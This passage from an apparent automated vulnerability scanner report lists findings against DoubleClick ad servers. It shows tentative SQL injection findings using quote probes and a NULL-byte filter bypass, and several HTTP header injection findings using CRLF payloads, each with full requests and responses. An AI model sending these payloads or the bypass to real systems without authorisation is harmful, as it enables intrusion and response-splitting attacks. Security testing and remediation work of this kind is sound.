1.3. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311008282&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311008282478&bpp=3&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311008279306&frm=4&adk=2516592769&ga_vid=1596259680.1311007547'&ga_sid=1311008279&ga_hid=429620988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&dff=times%20new%20roman&dfs=16&biw=1331&bih=853&eid=33895299&ref=http%3A%2F%2Fburp%2Fshow%2F51&fu=0&ifi=3&dtd=167&xpc=4A4EV9HiBw&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:08:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 5579
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:08:39 GMT

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311008282&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311008282478&bpp=3&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311008279306&frm=4&adk=2516592769&ga_vid=1596259680.1311007547''&ga_sid=1311008279&ga_hid=429620988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&dff=times%20new%20roman&dfs=16&biw=1331&bih=853&eid=33895299&ref=http%3A%2F%2Fburp%2Fshow%2F51&fu=0&ifi=3&dtd=167&xpc=4A4EV9HiBw&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:08:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 3724
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:08:40 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1'&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 14183
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
va2VuPSZ0b29saGFuZGxlcl9yZWRpcmVjdD0wJmlwPTIwOS4yMzUuMTAuODSAAgGoAwHIAxc&num=2&sig=AOD64_03toXT7WfAAjyKK1dUd9HdHUgGOw&client=ca-pub-1026799836550757&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dlog%2520analyzer%2520software%26_kt%3D78285438-606d-4d0e-9b34-ce1db027b29a" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1''&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 13835
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.5. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The xpc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the xpc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931690&bpp=2&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311007922811&frm=4&adk=2516592769&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1331&bih=853&eid=33895298&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=34&xpc=6HsRezTlah%00'&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:14:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 11893
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:14:26 GMT

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
GGh0dHA6Ly9sb29rdXBzZXJ2ZXIuY29tL-ABA4ACAagDAcgDF-gDNegD9gjoA6MF9QMAAADA&num=1&sig=AOD64_3ZVj_Lo-t-cb9KnSQYChR7EafSNQ&client=ca-pub-6114143813287942&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dweb%2520server%2520log%2520analysis%26_kt%3D8974c719-c103-4db7-9bcc-7279bc4ac8fc" id=aw0 onclick="ha('aw0')" onfocus="ss('','aw0')" onmousedown="st('aw0')" onmouseover="return ss('','aw0')" t
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931690&bpp=2&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311007922811&frm=4&adk=2516592769&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1331&bih=853&eid=33895298&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=34&xpc=6HsRezTlah%00''&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:14:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3512
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:14:28 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

2. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.tribalfusion/B2343920.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9a938%0d%0ac3e2240532d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9a938%0d%0ac3e2240532d/N3285.tribalfusion/B2343920.21;sz=160x600;click=http://a.tribalfusion.com/h.click/aDmNBGUAnTQq3XQsnnQWUy0dZbtWmQM4sJWYrQIVmqv56n9PmMG3dro0d3IpdZau46rS5sj8Tsv6Wsj8S6ryWW3UUr725bTtUqQvWaQlQEBZbRG3ZaRrImRd7bUGMQ2FurnWanYTew2dnHPcjH46JFmtIpUH760UU6YrY9VWeGjrZcqXA/;ord=475813307? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9a938
c3e2240532d
/N3285.tribalfusion/B2343920.21;sz=160x600;click=http: //a.tribalfusion.com/h.click/aDmNBGUAnTQq3XQsnnQWUy0dZbtWmQM4sJWYrQIVmqv56n9PmMG3dro0d3IpdZau46rS5sj8Tsv6Wsj8S6ryWW3UUr725bTtUqQvWaQlQEBZbRG3ZaRrImRd7bUGMQ2FurnWanYTew2dnHPcjH46JFmtIpUH760UU6YrY9VWeGjrZcqXA/;ord=475813307
Date: Mon, 18 Jul 2011 19:13:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5426163.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7345b%0d%0ad9736aeb174 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7345b%0d%0ad9736aeb174/N5823.152304.TRADEDESK/B5426163.28;sz=160x600;ord=3131077211711159573?;click=http://r.turn.com/r/formclick/id/FT1diCLScyvYjQ4AZQABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7345b
d9736aeb174
/N5823.152304.TRADEDESK/B5426163.28;sz=160x600;ord=3131077211711159573:
Date: Mon, 18 Jul 2011 19:13:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5426163.29

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e6a0%0d%0affebc99fc8b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e6a0%0d%0affebc99fc8b/N5823.152304.TRADEDESK/B5426163.29;sz=300x250;ord=8799339868473587130?;click=http://r.turn.com/r/formclick/id/uvVMTv2IHXrZFQcAcQABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e6a0
ffebc99fc8b
/N5823.152304.TRADEDESK/B5426163.29;sz=300x250;ord=8799339868473587130:
Date: Mon, 18 Jul 2011 19:18:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.18 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fd24%0d%0a168799bb10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fd24%0d%0a168799bb10/N3175.272756.AOL-ADVERTISING2/B4640114.18;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001028093/cstr=90758083=_4e24869e,3321855143,783329%5E1028093%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=90758083/optn=64?trg=;ord=3321855143? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fd24
168799bb10
/N3175.272756.AOL-ADVERTISING2/B4640114.18;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001028093/cstr=90758083=_4e24869e,3321855143,783329^1028093^1183^0,1_/xsxdata=$xsxdata/bnum=90758083/optn=64
Date: Mon, 18 Jul 2011 19:18:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.AEAOLService/B4970757.33

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5136d%0d%0a4ca7202ff2d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5136d%0d%0a4ca7202ff2d/N553.AEAOLService/B4970757.33;sz=300x250;pc=%5BTPAS_ID%5D;click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001034010/cstr=19608333=_4e2486a2,6057331701,783329%5E1034010%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=19608333/optn=64?trg=;ord=6057331701? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5136d
4ca7202ff2d
/N553.AEAOLService/B4970757.33;sz=300x250;pc=[TPAS_ID];click=http: //r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001034010/cstr=19608333=_4e2486a2,6057331701,783329^1034010^1183^0,1_/xsxdata=$xsxdata/bnum=19608333/optn=64
Date: Mon, 18 Jul 2011 19:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5823.152304.TRADEDESK/B5621931.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8727a%0d%0abf5d0ba888 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8727a%0d%0abf5d0ba888/N5823.152304.TRADEDESK/B5621931.6;sz=160x600;ord=4302430671862709008?;click=http://r.turn.com/r/formclick/id/EDsfm-ZNtTvIqQgAcgABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8727a
bf5d0ba888
/N5823.152304.TRADEDESK/B5621931.6;sz=160x600;ord=4302430671862709008:
Date: Mon, 18 Jul 2011 19:18:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/cm.bby.pcmcat203600050025/pcmcat203600050025 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.bby.pcmcat203600050025/pcmcat203600050025

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e59%0d%0a406ba78a9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78e59%0d%0a406ba78a9fd/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://images.bestbuy.com/BestBuy_US/en_US/images/global/admodel/fire.html?size=728x90&site=pcmcat203600050025&zone=pcmcat203600050025&id=pcmcat203600050025&type=list&subzone1=undefined&subzone1=undefined&subzone3=undefined&subzone4=undefined&tile=1
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e59
406ba78a9fd
/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161:
Date: Mon, 18 Jul 2011 12:59:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13222%0d%0a21d5724794f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13222%0d%0a21d5724794f/cm.ver.adhd_search/slideshow/womensymptoms;ugc=n;c=slideshow;i=c5822;dcopt=ist;comp=;tile=1;sz=728x90;vp=a;search=n;ord=240008804? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
